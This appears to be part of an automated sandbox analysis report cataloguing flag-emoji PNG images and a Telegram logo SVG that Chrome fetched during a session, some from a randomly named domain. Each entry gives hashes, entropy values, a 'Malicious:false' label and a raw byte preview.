                                  SHA-256:2DB133AC9CB87B81981F0B4DBFBE8D98729884C4D93DEEB1F487A84151C7F289
                                  SHA-512:FD83C37BC90757B19778D3F7F7530744F7CDA848D7784ECDE13614F2F00826394B773BDFB92CC22A327FDBD570B1571ECB1EE0EDD4EC6CC086018EEE4C35F1F0
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.Y[j.....l.....m.....j....................k.....w.......m..........k........m.....h..z8.......n.....o...........g.................................................................................................2................................................................0...............................0........................../................3...................*.0......{...........|/....jq..#..-.os.m..]c.lp.af.V\....\a.dg.Q,.LS.a&.?B.LQ.%/.A@.05.%/.5;}_..%.. *.%/.&..%..!+.$-.%..!*."+.%-..$.!*.*1.&...(.#+.16..%.D!..&..(.%-.(/.....$..&.#*..".&,..'..-.......$+..........."..%....%+..-..............".......$*............................!&v&)................................._$'............K&'w........r..;&&v..~..&&&k...&%.!!d...&%.$#.. .. ....)tRNS.....!08HQ`cccfhw}~~.....................c.~....gIDATx..[l..y......M..(.e7.a;N..NRI.......N..O}.[^.Z.....<....C....um.i-.r..N..H.L.")..%.\....9.W..Y-....L............
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4749
                                  Entropy (8bit):7.808226021119777
                                  Encrypted:false
                                  SSDEEP:96:2NX+jPqIOhm8FUY9FVxvJ1eUNSNs8avIRr2NDW2EbGSuy+XovJtPty5r07F:UIaUY9FXR1pNL8ay2NDW2CGS7+X6JtPL
                                  MD5:A2E719DCA76185E2226B03B8E2A78FBB
                                  SHA1:CF18AF91A4D3C7CC30C6F911A359F0335C56885E
                                  SHA-256:F3C0E6EC04C02777F242CD279E87FD7604A97ABA26380C0D7B7EB488F316DF51
                                  SHA-512:13B287DA531226AA6DA6580EDD1B84063A40314585BF27EFBB164DA828F49FD1F52D2C7865D74191A0B2AA35119FDBB773E5A670B6DF5BBEB6E820ACA04CF726
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLd..2}.&r.b...^o\...\ng...^p.^og..X...]n....~..p.i...[m^...]o.j..h~.y.a...\nh..1...^pi..`...^o.Zlh..._q_..j...Xj.dw>..k...Ug\....9..8..6..!.....8..6..8..!..5..#..5..5..2..3..0..2..2.. ..1..1..0..G../........,..,.....+..Y.. ..)..'..9..f..B..x..W....x...k\.g..D..j..H..d..N..>..U..Z..7..&..a..&..Z../..&..+..%..>..F..$.....$..%..J..$.....%.....^..!.....!..#.....R..0..".....:...........#..E..R.................)..S..!..6........D...........!...........6..H........#........:.................$.................,.....A..............!....................................................................,..........................0..............................................................................{.....}..v..z..y..u..q..n..i|.m..l..ew.h~.i..ez.at.\o.Xk.Tf........tRNS......%*8;KLWWccceguy~~............................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):6835
                                  Entropy (8bit):7.959001207355746
                                  Encrypted:false
                                  SSDEEP:192:m5siqTAZJiWgBPjecsROTh6S1y+SN9s1KD:m53/iW6ecIOTd1yZQe
                                  MD5:BC44F3015A905A5B2577D8C51C73809F
                                  SHA1:13FC88B73A8C9263C20FF094EEC9A46D462EDDD2
                                  SHA-256:47514B817C6DA3FC2F56A2F0A451032D31ABB7345B26C29FDFE3A5C4FECB2EAE
                                  SHA-512:C6A5E60E06F8F2E59DB3FB22441E262133CC4805F08FDB26FEEC55CFAF237ADA05383243124AF1E9553A952B159DE72CE01DA11315E60CD0E973EEE77A5105DA
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1f5.png
                                  Preview:.PNG........IHDR.....................PLTEGpL1]|b...>`\...=^g...<^<q.g...V..<^Dx.e...@jc...=^j..<n..>_^..j...:\b...>`k...@b]...5WAe~...........................................]...........m........................D.................y.................D........................h..........x..........?..........w..T.....?...}.|h...|!....sn.m.....o._..Q....~.t6]...b.s..Q..D...i!.zp"..yxxS..A...W,5..$..E...Y.hv..b+".....I|.xi.^}ZA}.%..6..,...UXsmj$..".....t\.qq7_mx ..2y.;v."}.'{..F..|..~.bfi.z.)s..w.h`\.y..N..u.6l..t..q..s..q..t..q..m.kH..p..p..+.V[`.o..n..m..l..6/.m..j.+d..k.t1..j.@[n=h2.g..j..i.VTS.h..e..i..h..g..a..f..d..e..d.BS^._..a..c.+Wu.b..[..a.`9v.`..`..].._.._.FKM.^..]..W..]..Z..[..U..W.0W".W.0I[.Qz.T..NrAAB.R..O..Mz.Il...:E..Is.Fh.J|.?U.Cd.Gw.Em.J.Y..)7D.@d.BnL*..?i.;_.6Y.>..0Q.#.B8......tRNS....%-:FU`cemx~...............CJ9....DIDATx..{|T..?.y.sf&g&.IB.....EP@.[)E~...Z..V...n.n......k+v.b.].zA.x.EQW)....\.Z...Bb.&7&3..s.s....\.5-....;..k.9....>. O.<y...'O.<
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5184
                                  Entropy (8bit):7.921857394453866
                                  Encrypted:false
                                  SSDEEP:96:9yrtvjmW48GiAMEr8qChlrAayh2yauuvpYigfHsPkqAIu3JirKH9W0+JX5jF:9yrt7RVAfr85hlUa02r9YfMPkqAIu3Ju
                                  MD5:03D784BA7763B92921BAA8533BB8879F
                                  SHA1:7126AB6E30B7538F72A2FED04808FC5AFF4EBB19
                                  SHA-256:D6DA4D72EC969D8507C7DF76D7CFD8269378BC2955278C329B43ABD1F1B49E6C
                                  SHA-512:729C26B2B32BF22E2B8DF9B8612D06FBA45A31FE122AF432600B36BEA0FF1F024E35E7994210074306FADCDC6A1A37FE9CE98B27D2ADA5036A9C354FF71CC141
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1fa.png
                                  Preview:.PNG........IHDR.....................PLTEGpL%5`ap...G\m...Hgx...J..KYl.....-fjy...Jh.._o...Jv...(4eu.aq...Jjz.. LM].ds...Ljz...I`p...L`p.k{.. M]n...Chy..$R.?L.................................................................................................................................................................................................x....{...hvo...Xfb{.jz.ev..M__q..EVTo.]n..1;Xl..2?Xi.Rh..4I.2FFe.Rd.Kd..9MLb...C.,AC^.G]..*>.<i.(<.5J=Y.BX..%9.+;.#86U.LP{.!68R...3_@~..-0P.0O...07N...,2L......"*L...,&J.1H...*..&%I..&8..3%H.)G...)$G."G..J.#F...)..'.L.!D."D...'..!..%&C."B..B.-?{..%..4.@...$.?.u K.?.....>...!.=.....<..;... .:..9..9.....8..7....O!V.5u.5.....4..4}.4..3.....1r.1..1.z.../...y..h....-.v...+o.+~.+..*f.*..)].)~f...'p.'{.&U.%y.#..#x.#u."Q.!h.!^..{..s..K..Q..t..Z..I..m..B76.....'tRNS....%,9CSUccegiv{~.....................A.N....IDATx....o\.y......rI.nd...eK.b.N.#...-..H..(..E./.X.{.....A..Ha....(.$u.'...$..X..J.E.$.z.s9.Y..ro$%.i............r.,....y&
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5291
                                  Entropy (8bit):7.93828775417545
                                  Encrypted:false
                                  SSDEEP:96:CzTVEZ6uyjnG2EVRiWAkav2rKOP1lD7r4XjAxzh1jninV7:CqQugnG24RpKEhxzhM
                                  MD5:7C7FAAC60E5567604A3FBD0303FBBF57
                                  SHA1:E72F684515CBD1CD7EC7D8DCC07A8ACC707E4709
                                  SHA-256:36AE211E1B0E9C35787BD3FBFF2331FE34A29103DED3BF0AC2863B90EE9A7DCB
                                  SHA-512:9CC9C91B38490986B3D92D83689278D12229A0D1BA5365F30BB95C34050235E971DDB0D464F43C29B17385B6AEEBA69C14B3BBE5950F53D071EA299D7137D55B
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.=5.$..g;.R'.!e.6{gy.gs.ep..>2.B2.B3iw.2TX.@)=Yi+C..E+i|..D*k{.an.^o.gw..E*.N0.D8.K0es.`o..P1.B%.C%.@#.<"Q`...&..%$P...%....<2$.[.|9.....>..A.6,%R..,...C.\R.;0..........~<..."! %.]....9/.....$.>3.{8.8-.C9.=......#!L..0..3..7.....?4.9..5..E<.OD..H!.X.2...J....;.%._.@.....A7.R*.% ..M..U.s6.YP.4x.V(..E.;4.UK.x8.LB.RH.WM.G=.a-.. ....V0.H".l2.M'.Z3.i<..Q..c.C..6...H.n=.%w..#)S...!....B!.wB..#....sA..F.E..A7.1(.2+.|E..!.*..5,..#..!.I?6].._6.*#.d8.H?,* ...E<..Q".V.....".^T.f2.8.g` ..!HA"..O.0...........8*.=(..#.D8]T NM...K.D.$T.....1...#qj#...&.f..O.......1..cW.x..K.....:..ZF%X..G>..V..>..$.PHA3s?.3..Q.P.a"1?{Ek8cAj9.p&{W5.5F.?0.1.99$..^..,>3.Y>xz}L@...`X.U..1..M6....mP.P[.?K.%gS.XZK.|E0<X.3S.C].<^.Db.0X.1N.Lk.j..)O.Ef.Ka._v.\r.6X.&J.Ph.Wn..?.>b..D..=.e{.Vp..H..Yq....%tRNS.c~c~~c.F$$:Tw.p....f...........]^....5IDATx...n.@...,.MZG..c."S$O..w@..d.$..C..(k.,y.^.b..1s.!...b 1.h.....N8..).p_K.y.....L&..d2.L&..d2.L.AJ..T].|>....j*.~.....r...XO
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:SVG Scalable Vector Graphics image
                                  Category:downloaded
                                  Size (bytes):932
                                  Entropy (8bit):4.808229443296337
                                  Encrypted:false
                                  SSDEEP:24:t41lDGwGlit3rBx5syIzafJoLDxyGqV5s1EM:ClazlmOySuQxyGqVqb
                                  MD5:67EDAAF1408D2278DB9F10FBC5690ADA
                                  SHA1:5CF2B6BA80881A1A8D48963A094D0D410022932A
                                  SHA-256:ADE1DDEC66F6E98E30D8A56B01E7DD9D2C84A8F4DAC51BC88D2AB5BC6E5D1A62
                                  SHA-512:0B6BB33DFE2808BA5EE926E0452F879421C1A102B05E43DD01B6DCCAD5393082C5E2C9D675FB203A0EB5E1FAE4BE244A12EC4F482AF7016B0F5962826D785A9B
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/telegram-logo.1b2bb5b107f046ea9325.svg
                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 120 120"><defs><linearGradient x1="50%" y1="0%" x2="50%" y2="100%" id="a"><stop stop-color="#38AEEB" offset="0%"/><stop stop-color="#279AD1" offset="100%"/></linearGradient></defs><g fill="none"><circle fill="url(#a)" cx="60" cy="60" r="60"/><path d="M23.775 58.77a3278.85 3278.85 0 0 1 39.27-16.223c18.698-7.454 21.3-8.542 23.828-8.58a4.995 4.995 0 0 1 2.977 1.103c1.058.9 1.38 1.47 1.47 1.972.083.503.075 2.07-.015 2.963-1.013 10.207-4.86 33.78-7.088 45.225-.945 4.837-2.805 6.457-4.605 6.615-3.907.345-6.877-2.475-10.664-4.86-5.925-3.728-7.905-5.1-13.65-8.737-6.653-4.2-3.916-5.663-.128-9.436.99-.982 17.415-15.974 17.662-17.34.21-1.2.286-1.357-.254-1.897-.548-.54-1.2-.473-1.62-.383-.6.128-9.645 5.85-27.15 17.176-2.685 1.777-5.115 2.64-7.298 2.595-2.4-.053-7.027-1.305-10.462-2.378-4.223-1.32-7.575-2.01-7.275-4.245.15-1.163 1.814-2.355 5.002-3.57Z" fill="#FFF"/></g></svg>.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4717
                                  Entropy (8bit):7.898305455870484
                                  Encrypted:false
                                  SSDEEP:96:hxncKr0sz4zdxlqC7igwDYVTdZELTUuzERGaB2Cb0FtIVRDFsJhKJW6:hlbz4zdxltigtT3ELT7oRGSwIJIh4T
                                  MD5:33B5316594A76A1C2B0FEEE32F0B5C2D
                                  SHA1:95B9C39BA0725436E1FB9B6C4E7D0017F152D64C
                                  SHA-256:A92BDFDF3EFEC85AA29458BC6F4FE599EE59071DC685102B4773BA3746039118
                                  SHA-512:68FDEAE4C9E44EBCD61FCC28207CCD75BEF0B55B05BA1F9AFE9BAA0B39767685613D5093F570D7A6E4B034E18B27B3F97977BD5F3046D87EE81D77AB0271E0D0
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL!=oZu.b}..*^\x..+^g...*]k...+^Yu........?..4mk...&Y^z.....(g)I~`z.l...*^c~.<[.i...+^b}.Rp..([j.._z..+_g...-`/P.k..]y..-`.2e.#W.......................................................................................................................................................................................................w.......k..t.._..k..e..\..S..`~.^z.Xz.Kz.]w.Pw.Tv.Ur.Is.Kq.?r.Qo.Bo.<m.Ek.Jj.<j.6j.Bf.0f.7d.9c.*d.1c.*c.&b.;_.>^.&a.+`.5^.%`.%`.%`.$_.%^.#^.#^."].#\.!\.&[.+Z. [."Z..Z..Y.,V..X..W..V.#U..V..U.8Qy.T.!R..R..R..Q.*N..Q..P..O..N..N..N..K..L..L..K..J..J..K..I..H..H..H..G..G..F..D..D..E..F..D..D..C..@..C..A..B..B..A..A..A..=..?..=~.>..>..=..<..:x.<..:..;..:..:..7o.7..7..5..6..3..3h.3x.4..3..1o....0e.*...y.,c.,n.$..(].(j.%_.#X..l. T.b#.....tRNS.....%,7@HPVccccehr~~......................................................................................................................:D.t....IDATx...=..D.........n6.;).../.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4586
                                  Entropy (8bit):7.91254454373437
                                  Encrypted:false
                                  SSDEEP:96:21UwGFFJbpV9AJ2LaRyt3k1Fx/7mjLCGp16Wxjmmy:+UwG1VV9AJ2ORyt3k1FxGLC4Timy
                                  MD5:906954BC15F0B43E4AE147813FBE198C
                                  SHA1:EECCA1A2AE787701B3475B58FA1C1F0BD50B52CE
                                  SHA-256:B138ABE5705548663A841F2C0709158CDCA3E261124874E908E5CA7A422E1D5C
                                  SHA-512:2B8ED20A3E70440D23F202A2E783891D0DE2EDA0AC93B1871694459D4F3F97E0308DCB5D6EC2B4C6E8FE113B8B44C1FA1ACBB42879869954E917D8FC1656CA2A
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1fc.png
                                  Preview:.PNG........IHDR.....................PLTEGpL. Eiy.ar...C\m...Bgx.. E..Bdu...CEUf.. ..^hy.(>e..B^o..'O...;B1..Gbr...Bl}.bs.<Nu. Egw.Zk...Cj{...Car.. Fj{.. Ek|.]n...=2Jq..............(.....)../.. ..3........6..6..5..'..2......../..,.....*..)..:.....%.....&..$.....#.....!..A..............!.....>........#..............K.:.#..........L..#.....W.....3..!..[.....`......q..w.f...}.?iz.k~lev.ar.^o.Zo.^trkt=Zk.Uk.TluOg.Re.Hb.VgTLa.A].F`uF\.;Y.AX.E[\OZ:4T.8S.<R|<Ug1P..O.3N.*L.&K.&K.&J.%J.%J.%I.%I.$I.*H.#H.1J^#H.$G."G. F."F."E. E.(D{"D. D..C..B..B.(Bl.B..A..A.!@|.?..?..>}.=..>.+?L.=..<v.<..;..9p.9x.9~.9..7..7~.6h.6|.6y.6q.5v.4..4p.4z.4|.3y.2g.0..2y.2v.1w.0h.0q.0v./_./t..]..t.,..-n.-r.,s.+b.*U.+p.*o.*q.)o.)l.(a.'N.%..(k.(m.'l.%r.%k.$J.$T.%g.#v.$j.$i.#Z....#e.!a. F..o. \..M..T..}..g..B..S..v..K..G..b..>..:..[j......*tRNS.....%*8;JSWYccefgu{~~~....................y.f...oIDATx...[l..]...........N..d....I..K.T..H...4ZU.JA!.@..Z.*...h...P..ZQ.....%.y)..!...iJ....6...e...\X.g..{......kiv_F.3.6c
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5826
                                  Entropy (8bit):7.950300772943556
                                  Encrypted:false
                                  SSDEEP:96:bYs5UsZSrwTQocg02n0H3kgITnV9n3rU4nuR+zhofFbDJt0kxC3XnYWBJ:bYs5UuSmQo50HUzV93X8+mFzbC3zX
                                  MD5:4D6FD3605505511FF3CE70FD8BB8C45E
                                  SHA1:9D4B9BD3F4BB23CA9015516E39CED01EC68CE958
                                  SHA-256:CD0711EC0167657CECDB806E72B316F402D829F9E31A5E6C3FCB4855CBCE1F8D
                                  SHA-512:3CBFBCBDFB5721B94773B796EAC60E327BEF764AA51D95C234B5F2A8595451358538762D5ADA7D775C801B4287BA0AFE56B4317FBAC2504BAEDA44BFB89FE396
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1e6.png
                                  Preview:.PNG........IHDR.....................PLTEGpL5^Ik.~.:$b.wc.w.;%.<&^.r.9#i.}i.}.:$.;%].q.S6n...?(d.x.4.-dIR}if.z.K2.< b.vn...;%j.~=kT.9$i.}b.wT~i.<&h.|.7!m..a.u.<%k..f.z.A+.7!1bJm..^.s.A+.3...................................................................}..w..s..n..i..d..n..`.~\.~k..i.}W.yf.{R.ua.wZ.t_.uL.p].rS.pH.lX.oS.nJ.jV.mA.hJ.hS~i<.d@.dG.d7.`L{d8._<._C{`3.\Ew_2.Z7|Z,.W9xY-~V).V).U(.V(.U).V.|U(.T)~U(~U'~S(}T?pX(|S&}R8sV'{R%|Q%{Q#{P$zO+vQ&xP#yN.rQ.zM"xM!wM vL!uL,oN6iP#sL.wJ.uJ.tJ.sI"pJ)lK.sG.uG.rG.qF!mH.pF.sD.oE.oD.nC.jE.mC.mB.pA.lB fD.lA.kA%bD.k@.j@.n?.j?.g@.h@.i?.f@.g?.i>.l<.h>.g=.c>.i;.g<.f<.a=.^?.d<.e<.e;.i8.d:.c9.b9.c8.^:.a9.b7.f6.[:.Z:.a7.`7.^7.`6.`5._5.V9.d2.^5.]4.^4.\4.]3.a/.S6.\3.\2.R5.[2.Z2.[0.W2.Z0.^+.Y0.Z/.O3.Y/.S1.X..V..K1.S+.P,.F..M*.I+.C,.K&.@).F&.D%.=&.?!.=!.9".; .6..3..0..p6....TtRNS.......#%15@CSUcedfilny}~.............................................................E.....IDATx........U.U...Yyw..a..eK..........$..? ......C ..Bn!G...&.s."B..."$.1JX..=le.;.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3905
                                  Entropy (8bit):7.878403960845231
                                  Encrypted:false
                                  SSDEEP:96:RxyyqhS+zJMstSq2SiHj8W4iADdDZxxn6NT9oX5AnMnV+:XNqhRHiD8OADvxxn6NT9op0MnV+
                                  MD5:B75C264E0836E912BD587ED5D58B2C70
                                  SHA1:B761CD66F2A0D4DCD42C6DF519C2C71245C39A11
                                  SHA-256:5AD2F63B7ED8D2C85BD52C22E7EEBBDAA9B2E096F9BAB8EE8C25CCED188592D3
                                  SHA-512:57A9B15D5A1A7D5DD503ED5E36CB4A74600629FEAE3F51FE5389A9FF4EDA55A756CC2DD453FFD82EFDD7342DF4574D8D1EECBD3B5B264D2097FAD1EACA9241D3
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL`[:...w^[..t.WM&....hk..b.z.|/..k...@!.ib].u.&)...{/.?..WZ.npm...M%.~0.B!...lo<wW.}0b.yj...@".|/.B"d.|...@!.D%.}0.kns...B"c.{...}0k...@!...}/a.zk...gi9xV..^..]..]..]..]..\..^..\..^..\..]..]..U..\..[..T..\..Z..[..[..S..[..`..X..[..W..X..d..[..W..W..X..g..W..V..V..k..W..n..T..r..S..]..T..t..]..Q..u..x..x..O..\....z..~..M..[..K..\.G..\..E..\..By.[..>..:_.[.rr..5_.x.ikH.[.]`..2J.c.ad.PAT.o.~05.Z.\_.PUD.h.UX.x,G.d.EI&.[.PT/.O5._.EI..[6.Z.GK.:?.4:).U.6<..[.28.;@./5..N..M..Z(.Q.9=./4.,2..L..K.&9..J.05..Z.*/..I..H.~I..G.(..'-..O.9;..F.&,.(...E.*/..M.%+..C.wF.$*.~B."(.*/..Y*nG.~A.$*.yB.|@.!'. %.&+.z>..%.y=..#.!'.w<..".v;.&+.',..!.o=.u:.......s8.d=..........r7....q6.l8....%).p5....%)..$.m4....k3.d5.g1..!....a..[0..!.X*....S+t...K(.O%|...K#.F$.B!j...>..a .....tRNS.....%.4599>EIHTbcddfop|~......................................................................................................................."...fIDATx...n.6...HQ...s.C.v1..7h
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4602
                                  Entropy (8bit):7.814736801660535
                                  Encrypted:false
                                  SSDEEP:96:JTYrQbXnzBo15HqC6GwS2KP/Y4gy89hmj34g+FfbOx9gvpwOnnzmjkeHK7:JeW3d6FQSN/Y08GmJo9K6OzmYeq7
                                  MD5:DF7FF5DE5DCE78C4A95258466D3DE9D5
                                  SHA1:ED9B8437A150E481C74A079BF131576C8E90B32F
                                  SHA-256:B49941A56101FC5E9668E7FB9B75699D3C5AF3708822337B6E81CD3C2520FF3E
                                  SHA-512:B0C961DE9DB796A054FF7E470AD291B89E4924CD6D8F6A8C9CA40D9EF86F66C54ED46223E626D16F79ABE0FBF2DC288C917C1A337A6CCD7BED414FD73FCEE7A7
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL..4..4..4.!7.!;. <. <.(D.3L.=S.1I.&@..4..+..,.....0..1..4..6..9..<..>.!@.$C.&D.)G.,K./M.1O.3Q.4Q.4R..6..................&F..=.`v...................................B..V..o.................................svy.y|pmuzfw.;duuu..............................JZ.`o.iw.jy.m{.r|.oxtfsuuustuz{{.................................Aa..s..lz.r..o}.hv.`q.Wk.Ne.E_.<W.3PIg...-..+....CY.5P................................0..%.v..........Tf.ap.Xh.L^.CV.;M..$.E..N.4|..\..W..a..f.#u..m..g..V..a..[..P..H|.Co.=i.6d.1\.7`.8b.6a.6`.:d.8b.............................................................................................................................................k.%}.${."z.#x. x..u..s..r..p..n..m..k..i..h..f..d..b..`..^..\..Z..X..W..U..P..K..D..=t.:p.:o...<....tRNS.c...................................................................|eI(.....9b...|b.s._6...............~~................................................................gP5%
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3415
                                  Entropy (8bit):7.8833961816045885
                                  Encrypted:false
                                  SSDEEP:96:GRWehP0FDMpUDHuiOk4qgheSFfu2fzW48:gPUDMOz7gheSFbV8
                                  MD5:E2F164E9A96FC8A8AE52F2496DFE5E46
                                  SHA1:49478F05FA70B7C5A8E79C417D6757CF373618B6
                                  SHA-256:ADA85F2307C115321CCAF830F498D6993A2128D11CBA19EE8ED227218E34F196
                                  SHA-512:A080F48B716F8ADA7A5BA355FC2644BD2992FBEA8C5C90C1FE4A35F482390362827538FCCBDA0D721520E5E354427320D5BD035082909E03C5B1EBF66CB3A207
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.V0..w..wS...yYul,c..k.yC3..g].uh.{wl.b...[!b.q.fe..+.ur.s.U..p..hph...g!.[ j.y4.G.u.p..W.b...fmj.x.r..X!a...u.V l.z.t.W .o..isi..k.y.p.8.K.X!.ti.wa...bj.o.\.k..4..3..M..8..8..7..6..7..7..5..7..*..6..4..*..6..3..:..5..2..?..,..F..5..2../..4..0..N..1..=..1..I..U..1..[..0..`.s.e./.m.f...,.*..Y..o..M|.Ay.?.j..'.Rk.z.{;`....%f.u_.qQ.g\.m..#.mu>.ZM.b,.L.k4R.c..!=.V*.J.gn).I(.H,.KE.V'.G&.F.bk%.E(.G.|.#.C%.D".B+.H.\e..R!.AJ.Q2.K .@.S`".A..?..P..>.v..W^..=..<..:.HV.q.".>..9..8.MW..69.L..6..5..5.;L..4..3..9.FP.@L..2..1!.:..0../..?.1C.>I.,=.4B.,<..-.*;.):..1$}4.'8.1?.%6..+.%6.G".(7."3Bg".!2. 1..0..C."1.u,./:....y'../.!1../..,."1..+..-..+.o).!/..*..(..'..).!...&..&.j"..$..#.g!..'..*.d#.."..*..,..".. ..*.^$........%....Z .....%.T....w."...j..s..d..].........xtRNS......! %049;CIRWXcdfimyz~~.............................................................................................i.......IDATx.....V........nH..J.....PJ`."....;.+y..B.0
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3862
                                  Entropy (8bit):7.882603105889187
                                  Encrypted:false
                                  SSDEEP:96:GRZ6f++xjy/+V4xOMOoWYLrmKvtsPJUpjDrESKtiNK:GRkfD2xbflrmKv0JODrESpw
                                  MD5:02DE05F59493AD53EE7171D7A3DFE640
                                  SHA1:1C2870AA1B346025DD4109F353FC4965267AB115
                                  SHA-256:18A78DBB2765FAA9EDF626E8526E4D5A14891227D72D32BBC80FA575E99C6EF0
                                  SHA-512:23B6EEBF161A08D9086498DAF7A71C90C978707893E434234E509AA2D1F9DC818C2CA536660B8EDB6EEFB24EDE0C97C6A6AC5D83943713C8A079062026851C21
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1f2.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.~z_D$.ifU.d..Y8!.f.sjb..O;".s{..]] $Eznua..j..#....s{a...;.l.#.iyf..E6n.#.r{.j.<1.s{ta.d..n.#.s{P.v.=2.fta..=1.r{d..n.#.;/.i.n.r`..C7.s{c../h[n.#.;/.rz.i.m.ub...4..6..6..7..1..8..8..0..0.....P..9..,..0..+..)..(..<..&.5..%..I..#.4..!..!.n.J.;./...T. ..."...;.....j...%...U.;...&......d...;.........'...G..........\.%....P.>......@.>..$..........q@..!....qy.. d...lt.`A....fo]...ak.]g....Wb._gU.}.z..Q].KCD.{.KX.w..LYJ.v.DR.@K.q.5.sA.q.<L.9H.5E~k..4E.4EAwk*.n.4D.5A.3D.6F2}l.3D.2C.3C.2C.1B..E.0A.1B./@xd...m.0A..j..?.->)yf..i..i.,=..h.-=7pc.(C.2?.+<..>&vc.}f.$8.#F.|e.0=q^..{d.yc.zc..F.*:.yb.w`.q^.+9.v_..G*gY.t].q[.s\.(6.nZ.qZ.oY.nW.mW.lU.%2.kT.fS.jT.iS.hR.gP.#/.fO.]L.cN.XH. +.^J.[H.XD|.(.RB.P>r.%m.".G8.D5.?2.9-]..P....tRNS.....!,579@EPSUWZccdediq|~...................................................................................................................m...:IDATx...=..D.....<c...=.']....s
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4824
                                  Entropy (8bit):7.921179190375871
                                  Encrypted:false
                                  SSDEEP:96:qiRvvrk65C3RYcfSJ0KPZ0vaqHoUbFw5j0PDNLjp8iHqL9wD0WbAN:qiRvvrFs3RYyfKcNbFw5ID9tTR0
                                  MD5:75C13831B3EB66B1FE55FD42E94EAA53
                                  SHA1:5A4D4C88E8C5F68065DA6E0A3FD22EA8D66F06A7
                                  SHA-256:0E8167B5DD831F290BCA4E7D9BE11AA5E8252CB823307277179E7A30900DE1F5
                                  SHA-512:4D5F72BF055895C8720FF39CFB5F9FB4DB7AD18415740D1543EE17F93273D471AC15B84B59ECDA09DDE9881ED9E8DE3A092FC9E5849B6C016EDF1F7B3AE2829E
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1f7.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.OX.MVj.).s|l!+.lue.%.v.f.&.v.g.&.ir.x..Ycg.'.qy.uEaG=..9i.).v~d.#.w..CNs$/.s|._/p.#.mv.z.`. m#-.lu.u~.BMk *c.#.z..irg.'.v.m#-.y..lua.!`...vD.uD.rD.+9.OV..5..7..7..0..4..,..:..0..=..3..<..B..L..C..R..Ju.Ud.WW.\.x.D.b.u~I.W.qz3.g.kv.nw.er8.]&.k.kt%.k%.j._m%.i.eo%.i..i..k#.h..l#.g.Xh-.g!.f*.]..m;.e!.eU.d..e@.d.dm..d.Xf..c.Qb..f..b.[gk.`..a.p_..a..`.M^.._._cG.^..d..^.P]..].IZ.S^..`..]&.\.XbtuZ..[.FY/.[.CX..\.@W..Z.EW.jW.DVL.W..Y.GW7.X..X.^U..X..W.AT.NZ.BT..V.;R..U.FU.>Q..T..S.@Q..T.=O.HT..R..SRvP..Q..P..P..P.:L.5K.=N.BP..Ns`L..M.=M.7J..Q..O..L..L.NH..K.5G.8I..J]dH.-E..H.9I..H.2D0xGySF.BI..F..K..F./B..E.1C..F..G.3D.7F..D..D..@.)?.3C..C6kAGbA..>.+=.3A.xE..?.$:.(:.-<[R<rE;.&8.0>.7;.$6.y:.'7..4. 4.!3.)7.-:.r6.!1.o6.*6....#0z'2.d1.T/.`/..*q%/..*v.*R/(m 